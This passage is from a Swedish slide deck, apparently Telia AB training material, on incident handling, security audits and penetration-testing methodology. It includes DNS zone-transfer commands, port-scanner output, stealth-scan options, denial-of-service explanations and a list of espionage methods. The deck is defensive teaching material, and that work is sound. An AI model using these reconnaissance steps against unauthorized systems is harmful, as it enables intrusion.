•Skadeståndskrav

•Kostnader

•Utredningssvårigheter

•Erfarenheter

•Rekommendationer och förbättringsförslag

Innan åtgärder i form av polisanmälan eller liknande utförs mot en misstänkt person skallhela materialet granskas av en för utredningen extern person. Syftet är att se attresonemanget håller, att det är lättförståeligt samt att händelsekedjan sitter ihop. Enincidenthanteringsgrupp med teknisk kompetens kan bistå vi denna typ av granskningar.

Page 22: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

22

Telia AB

Tips

u För incidentdagboku Ändra inte data - arbeta på kopia (backup)u Utse en (1) kontaktperson för BRUMu Informera enbart berörda (innersta kretsen)

enligt planu Använd etablerade informationskanaleru Skilj på vad du vet och vad du troru Dubbelkolla alla källor

Beskriv vad som har hänt. Om det är ett brott mot ordinarie rutin, handgrepp så beskriv hurdet utförs korrekt och enligt regelboken. Förklara men gräv inte ned dig i onödiga detaljer.Saknas uppgifter eller om något är oklart kommer utredarna kontakta dig för att få detförklarat. Det du förlorar är tid och utredningstakten kan slås av då de kanske lägger dittfall åt sidan medans du söker i loggfiler och talar med systemtekniker för att söka klarhet.Det är direkt tjänstefel av brottsutredande myndigheter att lägga ned en utredning de inteförstår – däremot kan de sinka arbetet om de inte förstår. Detta hör till den mänskligafaktorn då de ej vill visa sin okunskap, alternativt väntar in att någon specialistkompetensblir ledig eller de utbildar sig.

Vidare bör man ställa sig frågan: Hur mycket kan vi berätta? Kommer anmälan attinnehålla känsliga uppgifter för enskild, kan de vara för skada för annat företag, kan deskada oss eller är det företagshemliga uppgifter. Detta måste värderas. Anser man att det ärkänsliga uppgifter ska man bifoga sin utredning som separat bilaga med begäran omsekretess och hänvisning till eventuellt lagrum.

Page 23: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

23

Telia AB

De sju dödssynderna

N Rapporterar ej eller ber ej om assistans/hjälpN Ofullständiga eller avsaknad av anteckningarN Fel hanterade eller förstörda uppgifter (=bevis)N Inga fungerande säkerhetskopiorN Ej begränsat skadan eller ej tagit bort det som

orsakat/möjliggjort incidentenN Ej förhindrat återupprepningN Inte lärt sig av tidigare erfarenheter

Dessa 7 dödssynder talar för sig själva.

De medför ofelbart att hantering försvåras och att utredningen kan omöjliggöras.

Page 24: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

24

Telia AB

SÄKERHETSKONTROLLER

Page 25: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

25

Telia AB

Logisk Säkerhetskontroll

Konfigurations-och

Checkliste-kontroll

Säkerhetskontroll(Security Audit)

Penetrationstest

SäkerhetsRond

SäkerhetsRevision

Administrativ och Fysisk kontroll

Vid en konfigurations- och checklistekontroll kontrolleras systemet utifrån en givenchecklista, t.ex. checklista för UNIX, checklista för Windows/NT. Konfigurationsfiler isystemet och för dess applikationer granskas också. Ansatsen är att agera som ensäkerhetsmedveten systemadministratör.

Vid en säkerhetskontroll sker kontroller av att system och tjänster är konfigurerade på ettsäkerhetsmässigt korrekt sätt samt att dessa har motståndskraft mot intrångsförsök.Säkerhetsvalidering innebär även att man försöker finna eventuella säkerhetsbrister ochluckor som kan innebära en säkerhetsrisk i produkten eller tjänsten. Detta utförs med hjälpav säkerhetsanalyser, penetrationstester eller granskning av kravspecifikationer medavseende på säkerhet.

Ett penetrationstest innebär att systemets säkerhet kontrolleras. Syftet är att erhållaåtkomst till målsystemet, inte att kartlägga alla brister. Testet utförs, mot bakgrund avkunskap om vanliga fel och brister i operativsystem och nätkonfiguration samt hantering avsystem, för att upptäcka eventuella svagheter. De svagheter som upptäcks används för att,under kontrollerade former, ta sig in i system och nät. Dessa kontroller kan även påvisabrister i administrativa rutiner och regler, t.ex. om kontroller utförda inompenetrationstestet upptäcks, om loggfiler kontrolleras och om man följer fastställdaregelverk (policys) samt vilka åtgärder man vidtager.

Page 26: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

26

Telia AB

Konfiguration/checklistor

u Innehåller ”best practice” i konfigurationskunskapu Korrigerar välkända brister där det finns verktyg för

’script-kiddies’u Uppdateras regelbundetu Är obligatoriska att appliceras på system

Page 27: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

27

Telia AB

Checklistor, exempel

u SANS Institute’s Step-by-step Guides (www.sans.org)u Securing Windows NTu Securing Solarisu Securing Linux

u Ntbugtraqu Russ’ NT Security FAQ

u Microsoft (www.microsoft.com/security/tools.asp)u Windows NT Configuration Checklist

u IIS 4.0 Security Checklist

u Misti (Audit Program and Information Security Review Kits)

u Fred Cohen (Welcome to the 50 ways series)

Dessa exempel på checklistor är ett urval av alla de som finns. Normaltbrukar man ta hem en som verkar bra (SANS) och uppdatera denna enligt debehov och krav som företaget har. Den anpassas även så att bara deapplikationer som körs finns med på listan.

Page 28: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

28

Telia AB

Säkerhetskontroller

u Vulnerability scannersu Ögonblicksbildu Letar efter kända bristeru ”Point-and-click”u Snygga rapporteru Chefs-gränssnitt

En säkerhetskontroll ger en ”ögonblicksbild” av det aktuella systemet ochvisar dess eventuella brister. Precis som ett besiktningsprotokoll för din bil.

Dessa kontroller kan göras återkommande för att se om nya brister uppståttpga konfigurationsförändringar, nya program och funktioner eller bristandesystemadministration. De nya kontrollerna innefattar även kontroll omsystemet står emot de brister som upptäcks sedan förra gången kontrollenutfördes.

Page 29: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

29

Telia AB

Informella penetrationstester

• Syftet är att erhålla access till målsystemen.

Inte att kartlägga alla brister

• Kartlägg målsystem och påträffade brister

• Välj enklast möjliga intrångsmetod

snabbast, sexigast

• Dokumentera!

Page 30: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

30

Telia AB

Flödesschema för penetrationstester

Informations-insamling

Avgränsning målsystem

Intrång i målsystem

Kartläggningmålsystem

RapporteraDokumentera

Denna metodik är resultatet från flera olika penetrationsuppdrag. Denstämmer väl med den allmänna tron hur hackers/crackers arbetar. ;-) Många”tagna” hackers påstår att de väler ”offer” på måfå.

Grundinställningen är att alla program innehåller brister. Ju större program,desto flera brister. Även säkerhetsprogram/funktioner innehåller brister.

System som är anslutna till nätverk kör ofta flera samtidigt program, vilket isin tur leder till att systemets säkerhet kan ha försvagats. Med utgångspunktfrån detta resonemang går det att formalisera en arbetsmetodik. En attackkan delas in i fem separata steg:

Steg 1: Informationsinsamling

Steg 2: Avgränsningav intressanta målsystem

Steg 3: Kartläggning av målet.

Steg 4: Attack mot målet

a) Attack mot programvara/operativsystem

b) Attack mot kommunikationen

Då man etablerar sig i systemet, dvs man tar kontrollen över systemetgenom att utnyttjar brister i systemet, knäcker lösenordsfiler och installerarRootkit.

Då man lyckats etablera sig i systemet, finns små möjligheter att upptäckaeller att återställa den befintliga installationen. Nyinstallation är oftast endamöjligheten för att återställa ett drabbat system.

Steg 5: Dokumentera och rapportera

Page 31: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

31

Telia AB

Informationsinsamling

Informations-insamling

Avgränsning målsystem

• Publik information

• WEB, News

• RIPE, IANA

• Kataloger, databaser av olika slag

• Social Engineering

• Papperskorgar

• DNS

I Sverige, tänker inte företagen på industrispionage i konkreta termer, emellertid ärdet i andra länder ett legitimt sätt att skaffa sitt företag nödvändig information.Industrispionage går oftast under den kollektiva termen "Business Intelligence".Det är lagen och moraliska värderingar som bestämmer var gränsen går förinformationsinhämtningen. Nedan följer en gradering på metoder som företag kananvända för att skaffa information om konkurrenter:1 Publicerat material offentliga dokument, typ rättegångsprotokoll.2 Information som konkurrenter själva publicerar.3 Marknadsundersökningar och konsultrapporter.4 Finansiella rapporter, och mäklares prognoser.5 Mässor, utställningar och broschyrer.6 Analys av konkurrenters produkter.7 Rapporter från försäljningsavdelning och inköpsavdelningen8 Legitima anställningsintervjuer med personer som arbetat hos konkurrenter9 Kamouflerade "utpumpningar", av konkurrenter vid tekniska seminarier.10 Direkta observationer under hemliga förhållanden.11 Falska anställningsintervjuer med personer som arbetat hos konkurrenter.(m.a.o.utan någon verklig intention att anställa personen)12 Falska förhandlingar med konkurrenter om t ex samarbete eller licensavtal.13 Anställa professionella utredare att hämta specifik typ av information.14 Rekrytera medarbetare från konkurrent, för att få specifik ”know how”15 Gå in i konkurrentens byggnader, fabriker och egendom utan tillstånd.16 Muta konkurrenters leverantörer eller anställda.17 "Plantera" en agent på konkurrentens lönelista.18 Avlyssning av konkurrenter.19 Stöld av ritningar, prov, dokument och liknande egendom.20 Utpressning och hotelser.De första sju metoderna anses som moraliskt riktiga och lagliga. De resterande

Page 32: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

32

Telia AB

inetnum: 131.115.15.0 - 131.115.15.255netname: offerdescr: Offer no671descr: Seized-97country: SEadmin-c: OS212-RIPEtech-c: BA291-RIPEstatus: ASSIGNED PAmnt-by: TELIANET-LIRchanged: [email protected] 980325source: RIPE

Utdrag ur RIPEs databas

En uppslagning i RIPEs databas för att få reda på information om dettilltänkta offret.

Det finns speciella organisationer där man registrerar IP-adresser ochdomännamn. De har webbservrar där man kan samla information omspecifika IP-adresser, nätverk och domäner. Man får oftast namn påkontaktpersoner, tekniker som man kan kontakta vid eventuella fel.

Dessa är uppdelade på fllera sökdatabaser och man har delat upp världenenligt nedan:

•ARIN hanterar Nord-, Mellan- och Sydamerika (URL:http://www.arin.net/arin7arinwhois.html)

•APNIC hanterar Asien och Stilla Havet (URL:http://www.apnic.net/reg.html)

•RIPE hanterar Europa (URL: http://www.ripe.net/db/whois.html)

Det finns även utmärkta hjälpmedel som automatiskt söker efter deneftersökta IP-adressen eller domänen i flera olika databaser. Ett av dessaeminenta verktyg kallas Sam Spade och kör i Windows-miljö. Programmetär gratis. (URL: http://www.samspade.org)

I Unix-miljön kan man använda kommandon som whois, nslookup etc ellerverktyg som liknar Sam Spade.

Page 33: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

33

Telia AB

Domain Name Server

u Knyter datornamn till IP-adresser och vice versau Använder port 53 (udp/tcp)u Zone Transfer innebär att hela ”adressboken”

tankas utu Måste säkras upp genom att

u enbart tillåta Zone Transfers till legitima servraru stoppa alla externa förfrågningar på tcp/53 = zone

transfersu extern DNS ska enbart ge svar på system på externt

nät eller DMZ. En inre DNS hanterar det internanätverket

Genom att använda DNS, Domain Name Server, kan man ställa frågor somger uttömmande svar.

Förutom att få reda på vilka datornamn som motsvaras av IP-adresser kanman tanka hem hela IP-uppbyggnaden. Det kallas för Zone Transfers.

% nslookup

Default Server: terminator.movie.edu

Address: 0.0.0.0

> set type=any

> ls movie.edu.

Axfr är ett mycket effektivt verktyg att ”fråga ut” DNS. Det skapar en egenkomprimerad databas innehållande information om den ”Zon” maneftersökte. Axfr kan även användas för att ladda ned information ända fråntopp-domänerna, vilket inte är så smart men visar på styrkan i verktyget.

URL: ftp://ftp.trinux.org/pub/trinux/tools/netmap/axfr-0.5.2.tar.gz)

Page 34: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

34

Telia AB

Avgränsning av målsystem

Informations-insamling

Avgränsning målsystem

Kartläggningmålsystem

Identifiera vilka målsystem som är:

• intressanta

• ”förbjudna”

• ”känsliga” för störningar

Vid penetrationstest är det mer sällan att man får testa fritt (fria kriget) utanman får ett antal ip-adresser eller nätverk att ”hålla sig till”.

Vissa system är förbjudna att röra då dessa är kritiska för verksamheten.Detsamma gäller känsliga system.

Page 35: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

35

Telia AB

Kartläggning av målsystem

• Kartläggning av ”levande” system (Nätskiktet)

• Manuella verktyg såsom Ping, Traceroute m.fl.

• Automatiska verktyg såsom Scan, Nmap, Cheops, m.fl.

• Kartläggning av tjänster (Applikationer)

• Manuella verktyg såsom rpcinfo, showmount, telnet m.fl.

• Automatiska verktyg såsom Satan, ISS, Strobe m.fl.

Avgränsning målsystem

Intrång i målsystem

Kartläggningmålsystem

Fördelen att köra ”manuell” i stället för ”maskinellt” (dvs köra separataavgränsade program istf vulnerability scanners) är att man kan köra ”tyst”.

Ett moment i ett penetrationstest kan vara att se om systemadministratörerm.fl. upptäcker närvaron av PT-gänget. Om så är fallet kan man följa och sehur de agerar, vilka motåtgärder de vidtar och om de rapporterar till avseddchef/instans

Page 36: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

36

Telia AB

Ping

u Packet Internet Grouperu Kontrollera att ett system ”lever”u Använder ICMP Echo Requestu Finns ett otal olika varianteru Ping-of-Death

% ping -s ns.uu.net 56 5PING ns.uu.net: 56 data bytes64 bytes from ns.uu.net (137.39.1.3): icmp_seq=0. time=32.8 ms64 bytes from ns.uu.net (137.39.1.3): icmp_seq=1. time=15.3 ms64 bytes from ns.uu.net (137.39.1.3): icmp_seq=2. time=13.1 ms64 bytes from ns.uu.net (137.39.1.3): icmp_seq=3. time=32.4 ms64 bytes from ns.uu.net (137.39.1.3): icmp_seq=4. time=28.1 ms----ns.uu.net PING Statistics----5 packets transmitted, 5 packets received, 0% packet lossround-trip (ms) min/avg/max = 13.1/24.3/32.8

Ping (Packet Internet Grouper) använder ICMP Echo Request för att testa om man når ettsystem. ICMP (Internet Control Message Protocol) är kontroll-paket som används mellansystem/routrar att styra informationsflödet.När destinationen nås av ett Ping svarar denna med ett Echo Reply. Man får tillbaka ettantal rader med svarstider. Om destinationen inte svarade får man meddelandet”Destination unreachable”.Ett Ping sätt med maximal lävslängd på 255 hopp (Time To Live, TTL=255). Om ett pinginte nått destinationen vid det sista hoppet, avslutas sökningen och svaret ”Time exceeded”meddelas.Då destinationen nås sätts även TTL=255 innan svaret Echo Reply sänds tillbaka. Får mandå olika antal hopp mellan ping-begäran och svaret innebär detta att paketen gått olikavägar.Ping kan även användas för överbelastningsattacker genom att man sänder ett för stortping-paket till destinationen (Ping-of-Death).Om man sänder ett/flera Ping till en broadcast-adress och anger en falsk avsändaradress,kommer alla enheter på detta nätsegment att sända ett svar till den avsändaradress manangav. Genom att sända detta till flera broadcast-adresser genererar man så pass myckettrafik till destinationen så att denna kan ”lägga sig på rygg och dö” (Smurf-attack).Det finns många varianter på ping, tex: gping, hping, fping, pinger m.fl.

Ping-Of-DeathNormalt så delas (internet)trafiken upp i mindre bitar. Stora TCP-IP-paket delas upp imindre delar som sätts samman när de når sin slutdestination. Man kan skapa speciella IP-paket som ser ut som delar av större paket. När man samlar ihop alla småpaket bildas ettpaket som är alldeles för stort så kan leda till att nätverkshårdvara och tillämpningarkraschar.Det lättaste sättet att skapa dessa IP-paket är att använda kommandot ping. Dettakommando används för att kontrollera om en dator är tillgänglig, om den svarar på anrop.Det kan jämföras med att man ropar "hallå". Den adresserade datorn svarar "visst, jaglever" till avsändaren.De flesta maskinvaror klarar idag av att hantera för stora IP-paket, s.k. ping-attacker, mendet kan ändå vara värt att filtrera bort dessa för att slippa dessa attacker. Det kan vara värtatt notera att vissa skrivare har en dålig IP-implementation och kan stanna p.g.a. En ping-attack.

Page 37: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

37

Telia AB

Traceroute

u Spåra vägen paketen tar till målsystemetu Använder TTL (Time To Live) och en ogiltig portu UDP (normalt) / Linux I-option = (ICMP)u Brandväggar och routers kan konfigureras att ej

svara på ”TTL expired”-paket, både udp/icmp% traceroute ds.internic.nettraceroute to ds.internic.net (198.49.45.10), 30 hops max, 40 byte packets 1 gw-55.nuts.com (172.16.55.200) 0.95 ms 0.91 ms 0.91 ms 2 172.16.230.254 (172.16.230.254) 1.51 ms 1.33 ms 1.29 ms 3 gw225.nuts.com (172.16.2.252) 4.13 ms 1.94 ms 2.20 ms 4 192.221.253.2 (192.221.253.2) 52.90 ms 81.19 ms 58.09 ms 5 washdc1-br2.bbnplanet.net (4.0.36.17) 6.5 ms 5.8 ms 5.88 ms 6 nyc1-br1.bbnplanet.net (4.0.1.114) 13.24 ms 12.71 ms 12.96 ms 7 nyc1-br2.bbnplanet.net (4.0.1.178) 14.64 ms 13.32 ms 12.21 ms 8 cambridge1-br1.bbnplanet.net (4.0.2.86) 28.84 ms 27.78 ms 23.56 ms 9 cambridge1-cr14.bbnplanet.net (199.94.205.14) 19.9 ms 24.7 ms 22.3 ms10 attbcstoll.bbnplanet.net (206.34.99.38) 34.31 ms 36.63 ms 32.21 ms11 ds0.internic.net (198.49.45.10) 33.19 ms 33.34 ms *

Traceroute används för att spåra eller testa en uppkoppling samt hämtainformation om de system de nyttjar. På vägen till målsystem passerarpaketen ett antal routrar som tar hand om paketet och sänder det vidare.Man kan likna dom vid en vägvisare, som kontrollerar adressen och sänderiväg åt rätt håll. Varje steg kallas ett hopp.

Genom att använda traceroute kan man spåra vägen till en destination och fåreda på hur långt bort den är, vilka routrar den passerar samt om det är någraproblem på förbindelsen.

Traceroute skickar ut 3 ICMP-paket till varje router med TTL satt till 1. Denförsta routern minskar TTL med 1, vilket ger TTL=0. Detta innebär attsändningen avslutas och routern skickar en ”Time exceeded” i retur.Traceroute får då reda på routerns namn och IP-adress samt den tid som gåttåt.

Paket 2 skickar nästa 3 paket med TTL=2. Detta innebär att signalenkommer till nästa router på vägen till destinationen. Samma sak händer däroch även denna router sänder tillbaka namn, adress och tidsåtgång.

Därefter skickas nästa 3 paket med TTL=3. Detta förfarande upprepas tilldestinationen nås.

När traceroute inte får något svar rapporteras enbart asterisker (*). Det kanäven innebära att man stött på en brandvägg eller router som antingen inteska svara.

När destinationen är nådd erhåller traceroute returmeddelandet”Unreachable port”, detta eftersom traceroute sänder sina paket på en ogiltigport (33434)

Page 38: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

38

Telia AB

Traceroute

Page 39: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

39

Telia AB

Ultrascan

linux.log:Port# 7 on host 172.16.100.2 is activePort# 9 on host 172.16.100.2 is activePort# 11 on host 172.16.100.2 is activePort# 13 on host 172.16.100.2 is activePort# 15 on host 172.16.100.2 is activePort# 19 on host 172.16.100.2 is activePort# 21 on host 172.16.100.2 is activePort# 23 on host 172.16.100.2 is activePort# 25 on host 172.16.100.2 is activePort# 37 on host 172.16.100.2 is activePort# 79 on host 172.16.100.2 is activePort# 110 on host 172.16.100.2 is activePort# 111 on host 172.16.100.2 is activePort# 113 on host 172.16.100.2 is activePort# 119 on host 172.16.100.2 is activePort# 139 on host 172.16.100.2 is activePort# 513 on host 172.16.100.2 is activePort# 514 on host 172.16.100.2 is activePort# 515 on host 172.16.100.2 is activePort# 664 on host 172.16.100.2 is active

Windows NT-baseradportscanner

http://www.ntsecurity.net

Ultrascan output

Det finns 2**16-1 = 65 535 olika CP-portar och lika många UDP-portar påett system. Vanliga tjänster/services lyssnar på kända portar, t.ex.

FTP = 21 Telnet = 23 Sendmail = 25 DNS = 53

Webbserver = 80 eller 8080

Dock ska majoriteten vara stängda.

Genom att scanna/genomsöka ett system med ett verktyg som kontrolleraroch rapporterar de portar som är öppna (listening) kan man finna möjligavägar att ta sig in i ett system.

Det finns flera olika scanners, för olika plattformar, och alla har liknandefunktioner. Dock bör man tänka på att de allra flesta är högljudda, dvs synstydligt i loggfiler.

RFC 1700 beskriver de tjänster som har tilldelats en port. När man tagit redapå de portar som är öppna kan man börja leta efter brister i dessa tjänster.Genom att använda dessa brister kan man ta sig in i systemet,

Page 40: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

40

Telia AB

Strobe strobe 1.03 (c) 1995 Julian Assange ([email protected]).stats: host = babs trys = 2049 cons = 20 time = 49.94s trys/s = 41.03 trys/ss = 1.93stats: hosts = 2 trys = 2049 cons = 20 time = 49.98s trys/s = 41.00babs echo 7/tcp Echo [95,JBP]babs discard 9/tcp Discard [94,JBP]babs systat 11/tcp Active Users [89,JBP]babs daytime 13/tcp Daytime [93,JBP]babs netstat 15/tcp Netstatbabs chargen 19/tcp ttytst source Character Generatorbabs ftp 21/tcp File Transfer [Control] [96,JBP]babs telnet 23/tcp Telnet [112,JBP]babs smtp 25/tcp Simple Mail Transfer [102,JBP]babs time 37/tcp Time [108,JBP]babs finger 79/tcp Finger [52,KLH]babs pop3 110/tcp Post Office Protocol - Version 3babs sunrpc 111/tcp rpcbind SUN Remote Procedure Callbabs auth 113/tcp Authentication Service [130,MCSJ]babs netbios-ssn 139/tcp NETBIOS Session Service [JBP]babs login 513/tcp remote login a la telnet;babs cmd 514/tcp shell like exec, but automatic#babs shell 514/tcp rlogin style exec (rshd)babs printer 515/tcp spooler (lpd)babs doom 666/tcp doom Id Software#babs mdqs 666/tcp babs nfs 2049/tcp networked file system#babs shilp 2049/tcp

Strobe är en mycket snabb och pålitlig TCP-scanner för Unix-miljö. Denanpassar sig till målmiljön för att få mesta möjliga kräm ur nätverket. Dettagör att Strobe är väldigt effektiv.

Strobe v1.04 ger även information (banners) på öppna portar, om detta finnstillgängligt.

Eftersom Strobe gör connect-scan så syns den tydligt i loggfiler.

URL: ftp://ftp.win.or.jp/pub/network/misc/strobe-1.05.tar.gz

Netcat är ett ytterst kompetent scanner-verktyg som kan användas tillmånga fler sysslor. Den är som en schweizisk armekniv. Netcat i sig kräveren heltimmes presentation. Bland de funktioner som bör nämnas finns:

- portscanning

- ansluta till portar och exekvera kommandon, överföra data etc, etc

- söka efter expoterade filsystem, RPC-tjänster/portar, ftp-tjänster etc, etc,

- återspelningsattacker, installera backdörrar, reläa information (pipe), etcetc

URL: http://www.l0pt.com/users/10pht/nc110.tgz

Page 41: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

41

Telia AB

NMAP

Network Mapping by Fyodor

Multiscanner:• Stora nätverk / enstaka system• Specificerade portar• Klarar udp/tcp/icmp• ”Fingerprinting”

Andra features:• Dynamic delay time calc.• Packet timeout och omsändning• Parallell portscanning• Stealth-scanning• TCP sequence# predictability

NMAP är ett verktyg för portscanning av stora nätverk. Fast det fungerarlika bra för enstaka system.

Fungerar på UNIX-plattformar, såsom. Linux, FreeBSD, NetBSD ochOpenBSD. Den fungerar även bra på Solaris, IRIX och BSDI liksomSunOS, HP-UX, AIX, Digital Unix och Cray Unicos. Windowsplattform ärej planerad.

En väldigt flexibel MultiScanner som är snabb, flexibel och klarar olikaprotokoll (UDP, TCP, ICMP m.fl.). Den kan även köras i ”stealth”-modevilket gör att den är svårare att upptäcka.

URL: http://www.insecure.org

Skapad av Fyodor ([email protected])

Page 42: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

42

Telia AB

NMAP GUI

Flera olika avsökningar:• Vanilla TCP connect() scanning

• TCP SYN (half open) scanning

• TCP FIN, Xmas, or NULL (stealth) scanning

• TCP ftp proxy scanning (bounce attack)

• SYN/FIN scanning using IP fragments

• TCP ACK and Window scanning

• UDP raw ICMP port unreachable scanning

• ICMP scanning (ping-sweep)

• TCP Ping scanning

• Direct (non portmapper) RPC scanning

• Remote OS Identification by TCP/IP Fingerprinting

• Reverse-ident scanning

NMAP finns beskrivet och refererat till i otaliga artiklar och seminarier.

• Nmap wins Info World's 1998 Best Information Security Product award

•"Cracking Tools Get Smarter" -- Wired March 3 1999

•The CIO Institute Bulletin On Computer Security Vol. 2. No. 3. advancesthe theory that the "coordinated multi-national attacks" on the Pentagonwhich have been on the news lately may really be bored teenagers usingnmap :).

•"Free Windows-based scanners are plentiful, but only Asmodeus showspromise " -- Info World July 6, 1998. This InfoWorld security columnexamines Windows scanners and concludes that users should give up on theWindoze scanners and "take the time to install a Linux box and use nmap."

•" New Generation of Scanning Tools Mask Source of Attack" -- ComputerWorld March 15, 1999.

•"When Good Scanners Go Bad" -- Computer World March 22, 1999.

•"The Art and Detection of Port Scanning" is an introductory article whichfocuses on Nmap and appeard in Sys Admin Magazine in November 1998. Ihaven't found a online link to it. My prior Phrack 51 article entitled "The Artof Port Scanning" gives a more technical overview anyway.

•"Diary of a hack attack" -- Network World, January 10, 2000. Discussesthe activities of a professional security auditor. "Hacker Bob prefersnetwork mapping (nmap) ... it's a port scanner on steroids.

Page 43: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

43

Telia AB

System-A System-B NTWS-1 NTWS-3

System-C SunburnIntWeb NameSrv

NTWS-2

Cheops

Kartläggning av nätverkInfoinsamling via SNMP”Fingerprinting”

Har funktioner för:• Trafikflöden• Portscanning• SNMP-frågor

Vid kartläggning kan tysta eller mer eller mindre högljudda verktyganvändas.

Cheops presenterar en snygg grafisk bild av upptäckta system där ävenoperativsystem och version anges. Det går även att få fram informationavseende protokoll, trafikvägar m.m.

Cheops försöker med ”fingerprinting” och ritar ut det antagna OS.

Vidare kan man använda ping, traceroute, snmp-mappning samtportscanning

URL: http://www.marko.net/cheops

Page 44: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

44

Telia AB

Spårning

u Syns inte i ”normala” loggfiler

u Använd loggning för inetd

u Installera loggverktyg för TCP/IPu tcpdumpu snortu shadow

Page 45: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

45

Telia AB

Spår i loggen (tcpdump)

u En SYN-scan (connect-scan)

Port 21 är öppen på systemet offer.ISP.com:

11:56:20.442740 connect.scanner.net.1141 > offer.ISP.com.21: S 929641:929641(0) win 8192 <mss 536,nop,nop,sackOK> (DF)11:56:21.191786 offer.ISP.com.21 > connect.scanner.net.1141: S 779881634:779881634(0) ack 929642 win 8576 <mss 1460> (DF)11:56:21.201490 connect.scanner.net.1141 > offer.ISP.com.21: . ack 1 win 8576 (DF)

SYN / SYN ACK / ACK följs av en FIN / FIN ACK / FIN / FIN ACK

Port 37 är stängd på systemet offer.ISP.com:

11:56:23.954930 connect.scanner.net.1144 > offer.ISP.com.37: S 932103:932103(0) win 8192 <mss 536,nop,nop,sackOK> (DF)11:56:24.647238 offer.ISP.com.37 > connect.scanner.net.1144: R 0:0(0) ack 1 win 0

SYN / RST ACK

Page 46: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

46

Telia AB

Kartläggning av målsystem

• Kartläggning av användare och konton

• Testa ”default” konton för inloggning, filsystem (Win/NT)

• Testa vanliga namn (t.ex utgå från kända e-mail adresser)

• ”Lura” vanliga tjänster såsom Sendmail eller Rexec

• Kartläggning av brister

• Identifiera versionsnummer på web-server, smtp, ftp mm.

• Testa ”exploits”

•Leta efter felkonfigureringar (ofta i NFS, FTP, WEB miljö)

• Felaktiga exporträttigheter (NFS, Win95/NT Shares)

• Felaktiga root-kataloger (Ej chroot)

• Glömmer att stänga av ”standard” inställningar

Avgränsning målsystem

Intrång i målsystem

Kartläggningmålsystem

Page 47: Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

47

Telia AB

Händelse = Attack

VerktygFysisk attack

Utbyte av info

Kommando

Script / program

Autonom agent

Verktygslåda(toolkit)

Distribueratverktyg

Uttag av info(RöS, avlyssna)

BristKonstruktion

Implementation

Konfiguration

ÅtgärderFråga (probe)

Avsöka (scan)

Dränka (flood)

Autentisera

Kringgå

Lura (spoof)

Läsa

Kopiera

Stjäla

Modifiera

Radera

MålKonto

